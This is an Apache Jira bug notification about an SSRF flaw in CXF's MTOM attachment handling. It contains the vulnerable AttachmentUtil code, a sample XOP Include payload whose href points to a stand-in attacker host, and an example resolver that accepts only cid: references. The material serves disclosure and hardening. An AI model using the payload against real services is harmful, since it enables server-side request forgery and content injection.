[https://issues.apache.org/jira/browse/CXF-8706?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17651023#comment-17651023]
Andriy Redko edited comment on CXF-8706 at 12/21/22 11:38 PM:
--------------------------------------------------------------
Thanks [~cqlin]
> Did this prompt the new CVE-2022-46364: Apache CXF SSRF Vulnerability?
Not sure if I understand the question, but arbitrary data sources are disabled
by default, w/o any MTOM enablement mechanism.
> In the future, is there any better channel than this public Jira to report
> such vulnerability? I have been kind of worried in the last few months that
> this information is publicly available.
Since we are an ASF project, the [https://www.apache.org/security/] policy
regarding vulnerability reporting applies.
was (Author: reta):
Thanks [~cqlin]
> Did this prompt the new CVE-2022-46364: Apache CXF SSRF Vulnerability?
Not sure if I understand the question, but arbitrary data sources are disabled
by default, w/o any MTOM enablement mechanism.
> In the future, is there any better channel than this public Jira to report
> such vulnerability? I have been kind of worried in the last few months that
> this information is publicly available.
Since we are an ASF project, the [https://www.apache.org/security/] policy
regarding vulnerability reporting applies.
> CXF MTOM handler allow content injection
> ----------------------------------------
>
> Key: CXF-8706
> URL: https://issues.apache.org/jira/browse/CXF-8706
> Project: CXF
> Issue Type: Bug
> Components: JAXB Databinding
> Affects Versions: 3.5.2
> Reporter: Chunqing Lin
> Assignee: Andriy Redko
> Priority: Major
> Fix For: 3.4.10, 3.5.5, 4.0.0, 3.6.0
>
>
> When used with SOAP web service or JAXRS web service with MTOM enabled,
> Unmarshaller allows XOP Include tag to have href attributes that allow any
> protocols. According to the W3C MTOM spec, only "cid:" should be allowed for
> href scheme.
> The affected call stack is:
> AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>)
> line: 554
> JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49
> MTOMDecorator.startElement(TagName) line: 70
> The source code is:
> // Excerpt from org.apache.cxf.attachment.AttachmentUtil (CXF 3.5.2);
> // imports added here for context, method body unchanged
> import java.io.UnsupportedEncodingException;
> import java.net.MalformedURLException;
> import java.net.URL;
> import java.net.URLDecoder;
> import java.nio.charset.StandardCharsets;
> import java.util.Collection;
> import javax.activation.DataSource;
> import javax.activation.URLDataSource;
> import org.apache.cxf.interceptor.Fault;
> import org.apache.cxf.message.Attachment;
>
> public static DataSource getAttachmentDataSource(String contentId,
>                                                  Collection<Attachment> atts) {
>     // Is this right? - DD
>     if (contentId.startsWith("cid:")) {
>         try {
>             contentId = URLDecoder.decode(contentId.substring(4),
>                                           StandardCharsets.UTF_8.name());
>         } catch (UnsupportedEncodingException ue) {
>             contentId = contentId.substring(4);
>         }
>         return loadDataSource(contentId, atts);
>     } else if (contentId.indexOf("://") == -1) {
>         return loadDataSource(contentId, atts);
>     } else { // should only take cid for XOP
>         try {
>             // any scheme the JDK's URL supports is fetched from the server side here
>             return new URLDataSource(new URL(contentId));
>         } catch (MalformedURLException e) {
>             throw new Fault(e);
>         }
>     }
> }
>
> The exploit can send payload containing:
> <stringvalue><inc:Include href="http://attackers.site/exploit/payload"
> xmlns:inc="http://www.w3.org/2004/08/xop/include"/></stringvalue>
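Added illustration of the hardening the report asks for (this is example code, not CXF's own code and not the project's patch for this issue): a minimal XOP href resolver that honours only the cid: scheme and refuses anything carrying another scheme, so no server-side fetch can be triggered by the href. The in-memory attachment map and the class and method names are hypothetical stand-ins for CXF's Collection<Attachment> lookup.

```java
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.Map;

/**
 * Example resolver for XOP Include href values (not CXF code).
 * Only "cid:" references and bare Content-IDs are resolved; any href that
 * carries a scheme (http:, file:, jar:, ...) is rejected instead of being
 * handed to a URL loader.
 */
public final class SafeXopResolver {

    /** Hypothetical stand-in for CXF's attachment collection: Content-ID -> bytes. */
    private final Map<String, byte[]> attachments = new HashMap<>();

    public void addAttachment(String contentId, byte[] data) {
        attachments.put(contentId, data);
    }

    /**
     * Resolve an href to the referenced attachment.
     * "cid:" prefix is stripped and percent-decoded, as the original code does;
     * a bare id without any ':' is tolerated; everything else is an error.
     */
    public InputStream resolve(String href) {
        final String contentId;
        if (href.startsWith("cid:")) {
            contentId = URLDecoder.decode(href.substring(4), StandardCharsets.UTF_8);
        } else if (href.indexOf(':') == -1) {
            contentId = href; // bare Content-ID
        } else {
            // Rejecting on any ':' (not just "://") also stops scheme forms like "file:/..."
            throw new IllegalArgumentException(
                "XOP Include href must use the cid: scheme, got: " + href);
        }
        byte[] data = attachments.get(contentId);
        if (data == null) {
            throw new IllegalArgumentException("no attachment with Content-ID " + contentId);
        }
        return new ByteArrayInputStream(data);
    }

    public static void main(String[] args) throws Exception {
        SafeXopResolver resolver = new SafeXopResolver();
        // constructed sample attachment
        resolver.addAttachment("part1@example.org", "hello".getBytes(StandardCharsets.UTF_8));

        // legitimate reference: "%40" decodes to "@" and the part is found
        byte[] body = resolver.resolve("cid:part1%40example.org").readAllBytes();
        System.out.println(new String(body, StandardCharsets.UTF_8));

        // href with a remote scheme, as in the report: rejected before any network access
        try {
            resolver.resolve("http://attackers.site/exploit/payload");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The check is deliberately stricter than the original `indexOf("://")` test: matching on any `:` also refuses scheme forms without a double slash. A unit test for such a resolver should cover both a valid cid: reference and several scheme-bearing hrefs, asserting that the latter throw and that no URL object is ever constructed from the href.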
--
This message was sent by Atlassian Jira
(v8.20.10#820010)